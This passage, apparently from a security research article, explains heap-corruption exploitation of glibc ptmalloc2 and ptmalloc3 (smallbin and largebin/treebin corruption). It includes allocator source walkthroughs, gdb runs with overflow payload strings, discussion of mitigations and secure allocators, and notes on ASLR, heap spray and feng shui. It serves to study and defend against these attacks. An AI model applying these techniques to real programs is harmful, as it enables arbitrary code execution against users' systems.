+Having passed this code means that (buff2) has been introduced in its 
+corresponding largebin. Therefore we will reach this code:
+
+
+----- snip -----
+
+    if (!in_smallbin_range(nb)) {
+      bin = bin_at(av, idx);
+
+      for (victim = last(bin); victim != bin; victim = victim->bk) {
+	size = chunksize(victim);
+
+	if ((unsigned long)(size) >= (unsigned long)(nb)) {
+	  printf("\n[PTMALLOC2] No enter here please\n");
+	  remainder_size = size - nb;
+	  unlink(victim, bck, fwd);
+	  .....
+
+----- snip -----
+
+
+This does not look good. The unlink( ) macro is called, and we know the 
+associated protection since the 2.3.6 version of Glibc. Going there would 
+destroy all the work done until now.
+
+Here comes one of the first differences in the largebin corruption method. 
+In 2.2.1 we said that after overwriting the "bk" pointer of the free( ) 
+chunk, two calls to malloc( ) with the same size should be carried out to 
+return a pointer *mem in an arbitrary memory address.
+
+In largebin corruption, we must avoid this code at all cost. For this, the
+two calls to malloc( ) must be less than buff2->size. Phantasmal told us 
+"512 < M < N", and that is what we see in our vulnerable application:
+512 < 1536 < 2048.
+
+As it has not previously been freed any chunk of this size (1536) or at 
+least belonging to the same bin, "_int_malloc( )" tries to search a chunk 
+that can fulfill the request from the next bin to the recently scanned:
+
+
+    // Search for a chunk by scanning bins, starting with next largest bin.
+
+    ++idx;
+    bin = bin_at(av,idx); 
+
+
+And here is where the magic comes, the following piece of code will be 
+executed:
+
+
+----- snip -----
+
+      victim = last(bin);
+      .....
+      else {
+        size = chunksize(victim);
+
+        remainder_size = size - nb;
+
+printf("\n[PTMALLOC2] -> (Largebin code reached)");
+printf("\n[PTMALLOC2] -> remander_size = size (%d) - nb (%d) = %u", size,
+                                                       nb, remainder_size);
+printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);
+printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", victim->bk);
+
+        /* unlink */
+        bck = victim->bk;
+        bin->bk = bck;
+        bck->fd = bin;
+
+        /* Exhaust */
+        if (remainder_size < MINSIZE) {
+	  printf("\n[PTMALLOC2] -> Exhaust code!! You win!\n");
+          .....
+          return chunk2mem(victim);
+        }
+
+        /* Split */
+        else {
+          .....
+          set_foot(remainder, remainder_size);
+          check_malloced_chunk(av, victim, nb);
+          return chunk2mem(victim);
+        }
+      }
+
+----- snip -----
+
+
+The code has been properly trimmed to show only the parts that have 
+relevance in the method we are describing. Calls to printf( ) are of my own
+and you will soon see its usefulness.
+
+Also it's easy to see that the process is practically the same as in the
+smallbin code. You take the last chunk of the respective largebin 
+(last(bin)) in "victim" and proceed to unlink it (without macro) before 
+reaching the user control. Since we control "victim->bk", at first the
+attack requirements are the same, but then, where is the difference?
+
+Calling set_foot( ) tends to produce a segmentation fault since that
+"remainder_size" is calculated from "victim->size", value that until now we
+were filling out with random data. The result is something like the 
+following:
+
+
+(gdb) run `perl -e 'print "A" x 1036 . "\x44\xf0\xff\xbf"'`                                                                                  
+
+[PTMALLOC2] -> (Chunk from TOP)
+Buff1 -> [ 0x8050010 ]
+[PTMALLOC2] -> (Chunk from TOP)
+Buff2 -> [ 0x8050418 ]
+[PTMALLOC2] -> (Chunk from TOP)
+Buff3 -> [ 0x8050c20 ]
+
+[PTMALLOC2] -> (Freed and unsorted [ 0x8050410 ] chunk)
+[PTMALLOC2] -> (Chunk from TOP)
+Buff4 -> [ 0x8051c28 ]
+[PTMALLOC2] -> (Largebin code reached)
+[PTMALLOC2] -> remander_size = size (1094795584) - nb (1544) = 1094794040
+[PTMALLOC2] -> (victim = [ 0x8050410 ])
+[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
+4144              set_foot(remainder, remainder_size);
+(gdb)
+
+
+The solution is then enforce the conditional:
+
+   if (remainder_size < MinSize) {
+      ...
+   }.
+
+Anyone might think of overwriting "victim->size" with a value like 
+"0xfcfcfcfc" which would generate as a result a negative number smaller 
+than MINSIZE, but we must remember that "remainder_size" is defined as an 
+"unsigned long" and therefore the result will always be a positive value.
+
+The only possibility that remains then is that the vulnerable application
+allows us to insert null bytes in the attack string, and therefore to 
+supply a value as (0x00000610 = 1552) that would generate: 
+1552 - 1544 (align) = 8 and the condition would be fulfilled. Let us see in
+action:
+
+
+(gdb) set *(0x08050410+4)=0x00000610        
+(gdb) c                                     
+Continuing.                                
+Buff4 -> [ 0x8051c28 ]
+[PTMALLOC2] -> (Largebin code reached)
+[PTMALLOC2] -> remander_size = size (1552) - nb (1544) = 8
+[PTMALLOC2] -> (victim = [ 0x8050410 ])
+[PTMALLOC2] -> (victim->bk = [ 0xbffff044 ])
+
+[PTMALLOC2] -> Exhaust code!! You win!
+
+LB1 -> [ 0x8050418 ]
+[PTMALLOC2] -> (Largebin code reached)
+[PTMALLOC2] -> remander_size = size (-1073744384) - nb (1544) = 3221221368
+[PTMALLOC2] -> (victim = [ 0xbffff044 ])
+[PTMALLOC2] -> (victim->bk = [ 0xbffff651 ])
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0804a072 in _int_malloc (av=0x804e0c0, bytes=1536) at malloc.c:4144
+4144              set_foot(remainder, remainder_size);
+
+
+Perfect, we reached the second memory request where we saw that victim is
+equal to 0xbffff044 which being returned would provide a chunk whose *mem 
+pointes to the stack. However set_foot( ) again gives us problems, and this
+is obviously because we are not controlling the "size" field of this fake 
+chunk created on the stack.
+
+This is where we have to overcome the latter condition. Victim should point
+to a memory location containing user-controlled data, so that we can enter 
+an appropriate "size" value and conclude the technique.
+
+We end this section by saying that the largebin corruption method is not 
+just pure fantasy as we've made it a reality. However it is true that 
+finding the required preconditions of attack in real-life applications is
+almost impossible.
+
+As a curious note, one might try to overwrite "victim->size" with 
+0xffffffff (-1) and check that on this occasion set_foot( ) seems to follow
+its course without breaking the program.
+
+Note: Again we have not tested all versions of glibc, but we noted the
+following fixes in advanced versions:
+
+
+----- snip -----
+
+      else {
+        size = chunksize(victim);
+
+        /*  We know the first chunk in this bin is big enough to use. */
+        assert((unsigned long)(size) >= (unsigned long)(nb));  <-- !!!!!!!
+
+        remainder_size = size - nb;
+
+        /* unlink */
+        unlink(victim, bck, fwd);
+
+        /* Exhaust */
+        if (remainder_size < MINSIZE) {
+          set_inuse_bit_at_offset(victim, size);
+          if (av != &main_arena)
+            victim->size |= NON_MAIN_ARENA;
+        }
+
+        /* Split */
+        else {
+
+----- snip -----
+
+
+What this means is that the unlink( ) macro has been newly introduced into 
+the code, and thus the classic pointer testing mitigate the attack.
+
+
+
+               << Insanity is doing the same
+                  thing over and over again, and
+                  expecting different results. >>
+
+                                   [ Albert Einstein ]
+
+
+
+           .-------------------------.
+---[ 4 ---[   Analysis of Ptmalloc3   ]---
+           .-------------------------.
+
+Delving into the internals of Ptmalloc3, without warm up, may seem violent,
+but with a little help it's only a child's game.
+
+In order to understand correctly the next sections, I present here the most
+notable differences in the code with respect to Ptmalloc2.
+
+The basic operation remains the same, in the end it's another common memory
+allocator, and is also based on a version of Doug Lea allocator but adapted
+to work on multiple threads.
+
+For example, here is the chunk definition:
+
+
+struct malloc_chunk {
+  size_t               prev_foot;  /* Size of previous chunk (if free).  */
+  size_t               head;       /* Size and inuse bits. */
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+};
+
+
+As we see, the names of our well known "prev_size" and "size" fields have
+been changed, but the meaning remains the same. Furthermore we knew three
+usual bit control to which they added an extra one called "CINUSE_BIT"
+which tells (in a redundant way) that the current chunk is assigned, as
+opposed to that PINUSE_BIT that continues to report the allocation of the
+previous chunk. Both bits have their corresponding checking and assign
+macros.
+
+The known "malloc_state" structure now stores the bins into two different
+arrays for different uses:
+
+
+     mchunkptr  smallbins[(NSMALLBINS+1)*2];
+     tbinptr    treebins[NTREEBINS];
+
+
+The first of them stores free chunks of memory below 256 bytes. Treebins[]
+is responsible for long pieces and uses a special tree organization. Both
+arrays are important in the respective techniques that will be discussed in
+the following sections, providing there more details about its management
+and corruption.
+
+Some of the areas of greatest interest in "malloc_state" are:
+
+     char*      least_addr;
+     mchunkptr  dv;
+     size_t     magic;
+
+ * "least_addr" is used in certain macros to check if the address of a
+   given P chunk is within a reliable range.
+
+ * "dv", or Designated Victim is a piece that can be used quickly to serve 
+   a small request, and to gain efficiency is typically, by general rule, 
+   the last remaining piece of another small request. This is a value that
+   is used frequently in the smallbin code, and we will see it in the next
+   section.
+
+ * "Magic" is a value that should always be equal to malloc_params.magic 
+   and in principle is obtained through the device "/dev/urandom". This 
+   value can be XORed with mstate and written into p->prev_foot for later
+   to retrieve the mstate structure of that piece by applying another XOR
+   operation with the same value. If "/dev/urandom" can not be used, magic
+   is calculated from the time(0) syscall and "0x55555555U" value with 
+   other checkups, and if the constant INSECURE was defined at compile 
+   time magic then directly take the constant value: "0x58585858U".
+
+For security purposes, some of the most important macros are following:
+
+
+#define ok_address(M, a) ((char*)(a) >= (M)->least_addr)
+#define ok_next(p, n)    ((char*)(p) < (char*)(n))
+#define ok_cinuse(p)     cinuse(p)
+#define ok_pinuse(p)     pinuse(p)
+#define ok_magic(M)      ((M)->magic == mparams.magic)
+
+
+which could always return true if the constant INSECURE is defined at
+compile time (which is not the case by default).
+
+
+The last macro that you could be observe frequently is "RTCHECK(e)" which 
+is nothing more than a wrapper for "__builtin_expect(e, 1)", which in time 
+is more familiar from previous studies on malloc.
+
+As we said, "malloc_params" contains some of the properties that can be
+established through "mallopt(int param, int value)" at runtime, and
+additionally we have the structure "mallinfo" that maintains the global
+state of the allocation system with information such as the amount of 
+already allocated space, the amount of free space, the number of total free
+chunks, etc...
+
+Talking about the management of Mutex and treatment of Threads in Ptmalloc3
+is something beyond the scope of this article (and would probably require 
+to write an entire book), so we will not discuss this issue and will rather
+go forward.
+
+In the next section we see that every precaution that have been taken are 
+not sufficient to mitigate the attack presented here.
+
+
+
+               << Software is like entropy: It is
+                  difficult to grasp, weighs nothing,
+                  and obeys the Second Law of Thermodynamics:
+                  i.e., it always increases. >>
+
+                                         [ Norman Augustine ]
+
+
+
+             .---------------------------------.
+---[ 4.1 ---[   SmallBin Corruption (Reverse)   ]---
+             .---------------------------------.
+
+In an attempt to determine whether THoL could be viable in this last
+version of Wolfram Gloger. This version have a lot security mechanisms and 
+integrity checks against heap overflows, fortunately I discovered a variant
+of our smallbin corruption method, this variant could be applied.
+
+To begin, we compile Ptmalloc3 and link the library statically with the
+vulnerable application presented in 2.2.1. After using the same method to
+exploit that application (by adjusting the evil_func( ) address of course,
+which would be our dummy shellcode), we obtain a segment violation at
+malloc.c, particularly in the last instruction of this piece of code:
+
+
+----- snip -----
+
+void* mspace_malloc(mspace msp, size_t bytes) {
+  .....
+  if (!PREACTION(ms)) {
+    .....
+    if (bytes <= MAX_SMALL_REQUEST) {
+    .....
+      if ((smallbits & 0x3U) != 0) {
+        .....
+        b = smallbin_at(ms, idx);
+        p = b->fd;
+        unlink_first_small_chunk(ms, b, p, idx);
+
+----- snip -----
+
+
+Ptmalloc3 can use both dlmalloc( ) and mspace_malloc( ) depending on
+whether the constant "ONLY_MSPACES" has been defined at compile-time (this 
+is the default option -DONLY_MSPACES). This is irrelevant for the purposes 
+of this explanation since the code is practically the same for both 
+functions.
+
+The application breaks when, after having overwritten the "bk" pointer of 
+buff2, one requests a new buffer with the same size. Why does it happen?
+
+As you can see, Ptmallc3 acts in an opposite way of Ptmalloc2. Ptmalloc2 
+attempts to satisfy the memory request with the last piece in the bin, 
+however, Ptmalloc3 intends to cover the request with the first piece of the
+bin: "p = b->fd".
+
+mspace_malloc () attempts to unlink this piece of the corresponding bin to 
+serve the user request, but something bad happens inside the 
+"unlink_first_small_chunk( )" macro, and the program segfaults.
+
+Reviewing the code, we are interested by a few lines:
+
+
+----- snip -----
+
+#define unlink_first_small_chunk(M, B, P, I) {\
+  mchunkptr F = P->fd;\                  [1]
+  .....
+  if (B == F)\
+    clear_smallmap(M, I);\
+  else if (RTCHECK(ok_address(M, F))) {\ [2]
+    B->fd = F;\                          [3]
+    F->bk = B;\                          [4]
+  }\
+  else {\
+    CORRUPTION_ERROR_ACTION(M);\
+  }\
+}
+
+----- snip -----
+
+
+Here, P is our overwritten chunk, and B is the bin belonging to that piece.
+In [1], F takes the value of the "fd" pointer that we control (at the same 
+time that we overwrote the "bk" pointer in buff2).
+
+If [2] is overcome, which is a security macro we've seen in the previous
+section:
+
+
+    #define ok_address(M, a) ((char*)(a) >= (M)->least_addr)
+
+
+where the least_addr field is "the least address ever obtained from 
+MORECORE or MMAP"... then anything of higher value will pass this test.
+
+We arrive to the classic steps of unlink, in [3] the "fd" pointer of the 
+bin points to our manipulated address. In [4] is where a segmentation 
+violation occurs, as it tries to write to (0x41414141)->bk the address of 
+the bin. As it falls outside the allocated address space, the fun ends.
+
+For the smallbin corruption technique over Ptmalloc3 it is necessary to 
+properly overwrite the "fd" pointer of a freed buffer with a random 
+address. After, it is necessary to try making a future call to malloc( ), 
+with the same size, that returns the random address as the allocated space.
+
+The precautions are the same as in 2.2.1, F->bk must contain a writable 
+address, otherwise it will cause an access violation in [4].
+
+If we accomplish all this conditions, the first chunk of the bin will be 
+unlinked and the following piece of code will be triggered.
+
+
+----- snip -----
+
+        mem = chunk2mem(p);
+        check_malloced_chunk(gm, mem, nb);
+        goto postaction;
+
+        .....
+        postaction:
+            POSTACTION(gm);
+            return mem;
+
+----- snip -----
+
+
+I added the occasional printf( ) sentence into mspace_malloc( ) and the 
+unlink_first_small_chunk( ) macro to see what happened, and the result was 
+as follow:
+
+
+Starting program: /home/black/ptmalloc3/thl `perl -e 'print "A"x24 .
+"\x28\xf3\xff\xbf"'` < evil.in                                                                             
+
+[mspace_malloc()]: 16 bytes <= 244
+Buff1 -> [ 0xb7feefe8 ]
+[mspace_malloc()]: 128 bytes <= 244
+Buff2 -> [ 0xb7fef000 ]
+Buff3 -> [ 0xb7fef088 ]
+
+Buff4 -> [ 0xb7fef190 ]
+
+[mspace_malloc()]: 128 bytes <= 244
+[unlink_first_small_chunk()]: P->fd = 0xbffff328
+LB1 -> [ 0xb7fef000 ]
+
+[mspace_malloc()]: 128 bytes <= 244
+[unlink_first_small_chunk()]: P->fd = 0xbffff378
+LB2 -> [ 0xbffff330 ]
+
+Which is your favourite hobby:
+This is an evil function. You become a cool hacker if you are able to
+execute it
+
+
+"244" is the present value of MAX_SMALL_REQUEST, which as we can see, is 
+another difference from Ptmalloc2, which defined a smallbin whenever 
+requested size was less than 512. In this case the range is a little more 
+limited.
+
+
+
+               << From a programmer's point of view,
+                  the user is a peripheral that types
+                  when you issue a read request. >>
+
+                                      [ P. Williams ]
+
+
+
+             .----------------------------------------.
+---[ 4.2 ---[   LargeBin Method (TreeBin Corruption)   ]---
+             .----------------------------------------.
+
+At this point of the article, we have understood the basic concepts 
+correctly. One could now continue to study on his own the Ptmalloc3 
+internals.
+
+In Ptmalloc3, large chunks (ie larger than 256 bytes), are stored in a tree
+structure where each chunk has a pointer to its father, and retains two 
+pointers to its children (left and right) if having any. The code that 
+defines this structure is the following:
+
+
+----- snip -----
+
+struct malloc_tree_chunk {
+  /* The first four fields must be compatible with malloc_chunk */
+  size_t                    prev_foot;
+  size_t                    head;
+  struct malloc_tree_chunk* fd;
+  struct malloc_tree_chunk* bk;
+
+  struct malloc_tree_chunk* child[2];
+  struct malloc_tree_chunk* parent;
+  bindex_t                  index;
+};
+
+----- snip -----
+
+
+When a memory request for a long buffer is made, the
+"if (bytes <= MAX_SMALL_REQUEST) {}" sentence fails, and the executed code,
+if nothing strange happens, is as follow:
+
+
+----- snip -----
+
+    else {
+      nb = pad_request(bytes);
+      if (ms->treemap != 0 && (mem = tmalloc_large(ms, nb)) != 0) {
+        check_malloced_chunk(ms, mem, nb);
+        goto postaction;
+      }
+    }
+
+----- snip -----
+
+
+Into tmalloc_large( ), we aim to achieve this code:
+
+
+----- snip -----
+
+  if (v != 0 && rsize < (size_t)(m->dvsize - nb)) {
+    if (RTCHECK(ok_address(m, v))) { /* split */
+      .....
+      if (RTCHECK(ok_next(v, r))) {
+        unlink_large_chunk(m, v);
+        if (rsize < MIN_CHUNK_SIZE)
+          set_inuse_and_pinuse(m, v, (rsize + nb));
+        else {
+          set_size_and_pinuse_of_inuse_chunk(m, v, nb);
+          set_size_and_pinuse_of_free_chunk(r, rsize);
+          insert_chunk(m, r, rsize);
+        }
+        return chunk2mem(v);
+        .....
+
+----- snip -----
+
+
+If we tried to exploit this program in the same way as for Ptmalloc2, the
+application would break first in the "unlink_large_chunk( )" macro, which 
+is very similar to "unlink_first_small_chunk( )". The most important lines 
+of this macro are these:
+
+
+    F = X->fd;\ [1]
+    R = X->bk;\ [2]
+    F->bk = R;\ [3]
+    R->fd = F;\ [4]
+
+
+Thus we now know that both the "fd" and "bk" pointers of the overwritten
+chunk must be pointing to writable memory addresses, otherwise this could
+lead to an invalid memory access.
+
+The next error will come in: "set_size_and_pinuse_of_free_chunk(r, rsize)",
+which tells us that the "size" field of the overwritten chunk must be
+user-controlled. And so again, we need the vulnerable application to allow
+us introducing NULL bytes.
+
+If we can accomplish this, the first call to "malloc(1536)" of the 
+application shown in section 3 will be executed correctly, and the issue 
+will come with the second call. Specifically within the loop:
+
+
+----- snip -----
+
+  while (t != 0) { /* find smallest of tree or subtree */
+    size_t trem = chunksize(t) - nb;
+    if (trem < rsize) {
+      rsize = trem;
+      v = t;
+    }
+    t = leftmost_child(t);
+  }
+
+----- snip -----
+
+
+When you first enter this loop, "t" is being equal to the address of the 
+first chunk in the tree_bin[] corresponding to the size of the buffer 
+requested. The loop will continue while "t" has still some son and, finally
+"v" (victim) will contain the smallest piece that can satisfy the request.
+
+The trick for saving our problem is to exit the loop after the first 
+iteration. For this, we must make "leftmost_child(t)" returning a "0" 
+value.
+
+Knowing the definition:
+
+
+#define leftmost_child(t) ((t)->child[0] != 0? (t)->child[0]:(t)->child[1])
+
+
+The only way is to place (buff2->bk) in an address of the stack. It is 
+necessary the pointers child[0] and child[1] with a "0" value, which means 
+no more children. Then "t" (and therefore "v") will be provided while the 
+"size" field not fails the if( ) sentence.
+
+
+
+               << Before software should be
+                  reusable, it should be usable. >>
+
+                                  [ Ralph Johnson ] 
+
+
+
+             .-----------------------------.
+---[ 4.3 ---[   Implement Security Checks   ]---
+             .-----------------------------.
+
+Ptmalloc3 could be safer than it seems at first, but for this, you should
+have defined the FOOTERS constant at compile time (which is not the default
+case).
+
+We saw the "magic" parameter at the beginning of section 4, which is 
+present in all malloc_state structures and the way in which it is 
+calculated. The reason why "prev_size" now is named as "prev_foot" if that 
+if FOOTERS is defined, then this field is used to store the result of a XOR
+operation between the mstate belonging to the chunk and the magic value 
+recently calculated. This is done with:
+
+
+/* Set foot of inuse chunk to be xor of mstate and seed */
+#define mark_inuse_foot(M,p,s)\
+ (((mchunkptr)((char*)(p)+(s)))->prev_foot = ((size_t)(M) ^ mparams.magic))
+
+
+XOR, as always, remains being a symmetric encryption that allows, at the 
+same time, saving the malloc_state address and establishing a kind of 
+cookie to prevent a possible attack whenever altered. This mstate is 
+obtained with the following macro:
+
+
+#define get_mstate_for(p)\
+  ((mstate)(((mchunkptr)((char*)(p) +\
+    (chunksize(p))))->prev_foot ^ mparams.magic))
+
+
+For example, at the beginning of the "mspaces_free( )" function which is 
+called by the wrapper free( ), is started in this way:
+
+
+   #if FOOTERS
+       mstate fm = get_mstate_for(p);
+   #else /* FOOTERS */
+       mstate fm = (mstate)msp;
+   #endif /* FOOTERS */
+       if (!ok_magic(fm)) {
+         USAGE_ERROR_ACTION(fm, p);
+         return;
+       }
+
+
+If we corrupt the header of an allocated chunk (and therefore the prev_foot
+field). When the chunk was freed, get_mstate_for( ) will return an 
+erroneous arena. At this moment ok_magic( ) will test the "magic" value of 
+that area and it will abort the application.
+
+Moreover, one must be aware that the current flow could be broken even
+before the USAGE_ERROR_ACTION( ) call if the reading of fm->magic causes a 
+segmentation fault due to wrong value obtained by get_mstate_for( ).
+
+How to deal with this cookie and the probability analysis in order to
+predict its value at runtime is an old issue, and we will not talk more
+here about it. Though one could remember the PaX case, perhaps an 
+overwritten pointer can point beyond the "size" field of a chunk, and 
+through a future STRxxx( ) or MEMxxx( ) call, crush their data without have
+altered "prev_foot". Skape made an excellent job in his "Reducing the 
+effective entropy of gs cookies" [4] for the Windows platform. It could 
+give you some fantastic ideas to apply. Who knows, it all depends on the 
+vulnerability and inherent requirements of the tested application. 
+
+What is the advantage of THoL according to this protection? It is very 
+clear, the target chunk is corrupted after its release, and therefore the 
+integrity checks are passed.
+
+Anyway, there should be ways to mitigate these kinds of problems, to start,
+if we all know that no memory allocation should proceed belonging to a 
+stack location, one could implement something as simple as this:
+
+#define STACK_ADDR 0xbff00000
+
+#define ok_address(M, a) (((char*)(a) >= (M)->least_addr)\
+			  && ((a) <= STACK_ADDR))
+
+
+and the application is aborted before getting a successful exploitation.
+Also a check as ((a) >> 20) == 0xbff) should be effective. It is only an
+example, the relative stack position could be very different in your 
+system, it is a very restrictive protection.
+
+Anyone who read the source code base has probably noticed that Ptmalloc3's
+unlink...( ) macros omit the classic tests that implanted in glibc to check
+the double linked list. We do not consider this because we know that a real
+implementation would take it into account and should add this integrity 
+check. However, I can not perform a more detailed stud until someone 
+decides in a future that glibc will be based on Ptmalloc3.
+
+The conclusion of this overview is that some of the techniques detailed in
+the Maleficarum & Des-Maleficarum papers are not reliable in Ptmalloc3. One
+of them, for example, is The House of Force. Remember that it needs both to 
+overwrite the "size" field of the wilderness chunk and a request with a 
+user-defined size. This was possible partly in Ptmalloc2 because the size 
+of the top chunk was read in this way:
+
+
+    victim = av->top;
+    size = chunksize(victim);
+
+
+Unfortunately, now Ptmalloc3 saves this value in the "malloc_state" and 
+reads it directly with this:
+
+
+   size_t rsize = (g)m->topsize // gm for dlmalloc( ), m for 
+                                // mspace_malloc( )
+
+
+In any case, it is worth recalling one of the comments present at the 
+beginning of "malloc.c":
+
+     "This is only one aspect of security -- these checks do not,
+      and cannot, detect all possible programming errors".
+
+
+
+               << Programming without an overall architecture
+                  or design in mind is like exploring a cave
+                  with only a flashlight: You don't know where
+                  you've been, you don't know where you're going,
+                  and you don't know quite where you are. >>
+
+                                                 [ Danny Thorpe ]
+
+
+
+               .-----------------------------------.
+---[ 4.3.1 ---[   Secure Heap Allocator (Utopian)   ]---
+               .-----------------------------------.
+
+First, there is no way to create a "heap allocator" totally secure, it's
+impossible (note: you can design the most secure allocator in the world but
+if it's too slow => it's no use). To begin with, and the main rule (which
+is fairly obvious), implies that the control structures or more simply,
+headers, can not be located being adjacent to the data. Create a macro that
+adds 8 bytes to the address of a header for direct access to data is very
+simple, but has never been a safe option.
+
+However, although this problem will be solved, still others thought to
+corrupt the data of another allocated chunk is not useful if it not allows
+arbitrary code execution, but and if these buffers contain data whose
+integrity has to be guaranteed (financial information, others...)?
+
+Then we came to the point in which it is essential the use cookies between 
+the fragments of memory assigned. It obviously has side effects. The most
+efficient would be that this cookie (say 4 bytes) will be the last 4 bytes
+of each allocated chunk, with the target of preserve the alignment, since
+that put them between two  chunks required a more complicated and possibly
+slower management.
+
+Besides this, we could also take ideas from "Electric Fence - Red-Zone
+memory allocator" by Bruce Perens [5]. His protection ideas are:
+
+
+   - Anti Double Frees:
+
+	if ( slot->mode != ALLOCATED ) {
+ 		if ( internalUse && slot->mode == INTERNAL_USE )
+			.....
+		else {
+			EF_Abort("free(%a): freeing free memory.",address);
+
+   - Free unallocated space (EFense maintains an array of addresses
+     of chunks allocated (slots) ):
+
+	slot = slotForUserAddress(address);
+	if ( !slot )
+		EF_Abort("free(%a): address not from malloc().", address);
+
+
+Other implementations of dynamic memory management that we should take into
+account: Jemalloc on FreeBSD [6] and Guard Malloc for Mac OS X [7].
+
+The first is specially designed for concurrent systems. We talked about
+management of multiple threads on multiple processors, and how to achieve 
+this efficiently, without affecting system performance, and getting better 
+times in comparison with other memory managers.
+
+The second, to take one example, use the pagination and its mechanism of
+protection in a very clever way. Extracted directly from the manpage, we 
+read the core of his method:
+
+   "Each malloc allocation is placed on its own virtual memory page, with 
+    the end of the buffer at the end of the page's memory, and the next 
+    page is kept unallocated. As a result, accesses beyond the end of the 
+    buffer cause a bus error immediately. When memory is freed, libgmalloc 
+    deallocates its virtual memory, causing reads or writes to the freed 
+    buffer cause a bus error."
+
+Note: That's a really interesting idea but you should take into account the
+fact that such a technic is not _that_ effective because if would sacrifice
+a lot of memory. It would induce a PAGE_SIZE (4096 bytes is a common value,
+or getpagesize( ) ;) allocation for a small chunk.
+
+In my opinion, I do not see Guard Malloc as a memory manager of routine 
+use, but rather as an implementation with which to compile your programs in
+the early stages of development/debugging.
+
+However, Guard Malloc is a highly user-configurable library. For example,
+you could allow through an specific environment variable 
+(MALLOC_ALLOW_READS) to read past an allocated buffer. This is done by 
+setting the following virtual page as Read-Only. If this variable is 
+enabled along with other specific environment variable 
+(MALLOC_PROTECT_BEFORE), you can read the previous virtual page. And still 
+more, if MALLOC_PROTECT_BEFORE is enabled without MALLOC_ALLOW_READS buffer
+underflow can be detected. But this is something that you can read in the 
+official documentation, and it's needless to say more here.
+
+
+
+               << When debugging, novices insert corrective
+                  code; experts remove defective code. >>
+
+                                         [ Richard Pattis ]
+
+
+
+               .------------.
+---[ 4.3.2 ---[   dnmalloc   ]---
+               .------------.
+
+This implementation (DistriNet malloc) [10] is like the most modern 
+systems: code and data are loaded into separate memory locations, dnmalloc 
+applies the same to chunk and chunk information which are stored in 
+separate contiguous memory protected by guard pages. A hashtable which 
+contains pointers to a linked list of chunk information accessed through 
+the hash function is used to associate chunks with the chunks information.
+[12]
+
+Memory with dnmalloc:
+
+        .---------------.
+        |  .text        |
+        .---------------.
+        |  .data        |
+        .---------------.
+           ...        
+        .---------------.
+        |  Chunks        |
+        .---------------.
+            ..
+            ||
+            ||  
+            \/
+        
+            /\
+            || 
+            ||
+            ..
+        .--------------------.
+        |  Memory Page       | <- This Page is not writable
+        .--------------------. 
+        |  Chunk Information |
+        .--------------------.
+        |  The Hash Table    |
+        .--------------------. 
+        |  Memory Page       | 
+        .--------------------. 
+        |  The Stack         | <- This Page is not writable
+        .--------------------.
+
+The way to find the chunk information:
+
+1.- Address of the chunk - Start address of the heap = *Result*
+
+2.- To get the entry in the Hash Table: shift *Result* 7 bits to the right.
+
+3.- Go over the linked list till it have the correct chunk.
+
+ .-------------------------------------.
+ |           The Hash Table            |
+ . ................................... . 
+ |  Pointers to each Chunk Information | --> Chunk Information (Hash Next 
+ .-------------------------------------.     to the next Chunk Information)
+
+The manipulation of the Chunk Information:
+
+1.- A fixed area is mapped below the Hash table for the Chunks Information.
+
+2.- Free Chunk Information are stored in a linked list.
+
+3.- When a new Chunk Information is needed the first element in the free 
+    list is used.
+
+4.- If none are free a Chunk is allocated from the map.
+
+5.- If the map is empty It maps extra memory for it (and move the guard 
+    page).
+
+6.- Chunk information is protected by guard pages.
+
+
+
+               << Passwords are like underwear: you don't let
+                  people see it, you should change it very often,
+                  and you shouldn't share it with strangers. >>
+
+                                                [ Chris Pirillo ] 
+
+
+
+               .------------------.
+---[ 4.3.3 ---[   OpenBSD malloc   ]---
+               .------------------.
+
+This implementation [11] [13] have the design goals: simple, unpredictable,
+fast, less metadata space overhead, robust for example freeing of a bogus 
+pointer or a double free should be detected ... 
+
+About the Metadata: keep track of mmaped regions by storing their address 
+and size into a hash table, keep existing data structure for chunk 
+allocations, a free region cache with a fixed number of slots:
+
+Free regions cache
+
+1.- Regions freed are kept for later reuse
+
+2.- Large regions are unmapped directly
+
+3.- If the number of pages cached gets too large, unmap some.
+
+4.- Randomized search for fitting region, so region reuse is less
+    predictable
+
+5.- Optionally, pages in the cache are marked PROT_NONE
+
+
+
+               << Getting information off the Internet is
+                  like taking a drink from a fire hydrant. >>
+
+                                           [ Mitchell Kapor ]
+
+
+
+           .-----------------------------.
+---[ 5 ---[   Miscellany, ASLR and More   ]---
+           .-----------------------------.
+
+We already mentioned something about ASLR and Non Exec Heap in the Malloc
+Des-Maleficarum paper. Now we do the same with the method we have studied.
+
+For the purposes of this technique, I considered disabled the ASLR in all
+examples of this article. If this protection was enabled in real life then
+randomization only affects to the position of the final fake chunk in the
+stack and our ability to predict a memory address close enough to a saved
+return address that can be overwritten. This should not be an utterly 
+impossible task, and we consider that the bruteforce is always a 
+possibility that we will have a hand in most restrictive situations.
+
+Obviously, the non-exec heap does not affect the techniques described in
+this paper, as one might place a shellcode in any elsewhere, although we
+warn that if the heap is not executable it is very likely that the stack 
+will not be either. Therefore one should use a ret2libc style attack or 
+return into mprotect( ) to avoid this protection.
+
+This is an old theme, and each will know how to analyze problems underlying
+the system attacked.
+
+Unfortunately, I do not show a real-life exploit here. But we can talk a 
+bit about the reliability and potential of success when we are studying a
+vulnerability in the wild.
+
+The preconditions are clear, this has been seen repeatedly throughout of
+this article. The obvious difference between the PoC's that I presented 
+here and the applications you use every day (as well as email clients, or
+web browsers), is that one can not predict in a first chance the current 
+state of the heap. And this is really a problem, because while this is not 
+in a fairly stable and predictable state, the chances of exploiting will be
+minimal.
+
+But very high-level hackers have already met once this class of problems,
+and over time have been designing and developing a series of techniques
+which allow reordering the heap so that both, the position of the allocated
+chunks as the data contained within them, are parameters controlled by the
+user. Among these techniques, we must appoint two best known:
+
+   - Heap Spray
+   - Heap Feng Shui
+
+You can read something about them in the following paper presented at the
+BlackHat 2007 [8]. In short we can say that the "Heap Spray" technique
+simply fill in the heap as far as possible by requesting large amount of
+memory placing there repetitions of nop sleds and the opportune shellcode,
+then just simply find a predictable memory address for the "primitive 
+4-byte overwrite". A very clever idea in this technique is to make the nop 
+sled values equal to the selected address, so that it will be 
+self-referential.
+
+Feng Shui is a much more elaborate technique, it first tries to defragment 
